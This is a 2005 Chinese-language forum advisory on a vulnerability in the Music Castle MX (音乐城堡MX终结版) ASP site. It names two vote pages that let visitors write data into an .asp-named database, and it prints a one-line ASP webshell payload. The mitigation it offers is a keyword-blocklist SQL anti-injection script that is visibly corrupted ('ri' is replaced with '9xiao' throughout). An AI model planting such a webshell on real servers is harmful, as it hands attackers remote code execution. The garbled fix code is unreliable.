音乐城堡MX终结版存在漏洞

2005-11-28 22:21:46 by: h4x0r

音乐城堡MX终结版存在漏洞

Font Size: Large | Medium | Small

默认投票和错误报告数据库（vote/mevote.asp）如果没有改名，访问vote/sendeoff.asp?b1=1和vote/sendflash.asp?b1=1可以插入一句话木马

<%execute(request("h4x0r"))%>

解决办法数据库做防下载处理或者改mdb后缀名或者修改conn.asp文件内容

<%
'--------版权说明------------------
'SQL通用防注入程序 V2.0 完美版
'本程序由枫知秋独立开发
'小蛤蟆在此感谢此程序的作者,并留有版权

'--------定义部份------------------
Dim Fy_Post,Fy_Get,Fy_In,Fy_Inf,Fy_Xh,Fy_db,Fy_dbstr
'自定义需要过滤的字串,用 "枫" 分隔
Fy_In = "'枫;枫and枫exec枫insert枫select枫delete枫update枫count枫*枫%枫chr枫mid枫master枫truncate枫char枫declare"
'----------------------------------
%>

<%
Fy_Inf = split(Fy_In,"枫")
'--------POST部份------------------
If Request.Form<>"" Then
For Each Fy_Post In Request.Form

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.Form(Fy_Post)),Fy_Inf(Fy_Xh))<>0 Then

Response.W9xiaote "<Sc9xiaopt Language=JavaSc9xiaopt>alert('SQL防注入系统提示↓\n\n请不要在参数中包含非法字符尝试注入！\n\n 操作将全部被记录到数据库！');</Sc9xiaopt>"
Response.W9xiaote "非法操作！系统做了如下记录↓ "
Response.W9xiaote "操作ＩＰ："&Request.ServerVa9xiaoables("REMOTE_ADDR")&" "
Response.W9xiaote "操作时间："&Now&" "
Response.W9xiaote "操作页面："&Request.ServerVa9xiaoables("URL")&" "
Response.W9xiaote "提交方式：ＰＯＳＴ "
Response.W9xiaote "提交参数："&Fy_Post&" "
Response.W9xiaote "提交数据："&Request.Form(Fy_Post)
Response.End
End If
Next

Next
End If
'----------------------------------

'--------GET部份-------------------
If Request.QuerySt9xiaong<>"" Then
For Each Fy_Get In Request.QuerySt9xiaong

For Fy_Xh=0 To Ubound(Fy_Inf)
If Instr(LCase(Request.QuerySt9xiaong(Fy_Get)),Fy_Inf(Fy_Xh))<>0 Then
Response.W9xiaote "<Sc9xiaopt Language=JavaSc9xiaopt>alert('SQL防注入系统提示↓\n\n请不要在参数中包含非法字符尝试注入！\n\n 操作将全部被记录到数据库！');</Sc9xiaopt>"
Response.W9xiaote "非法操作！系统做了如下记录↓ "
Response.W9xiaote "操作ＩＰ："&Request.ServerVa9xiaoables("REMOTE_ADDR")&" "
Response.W9xiaote "操作时间："&Now&" "
Response.W9xiaote "操作页面："&Request.ServerVa9xiaoables("URL")&" "
Response.W9xiaote "提交方式：ＧＥＴ "
Response.W9xiaote "提交参数："&Fy_Get&" "
Response.W9xiaote "提交数据："&Request.QuerySt9xiaong(Fy_Get)
Response.End
End If
Next
Next
End If
On Error Resume Next
dim conn
dim dbpath
set conn=server.createobject("adodb.connection")
DBPath = Server.MapPath("mevote.asp")
conn.Open "d9xiaover={ Microsoft Access D9xiaover (*.mdb) };dbq=" & DBPath
%>
<%
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.cachecontrol = "no-cache"
%>

请大家不要利用此漏洞破坏国内网站 by h4x0r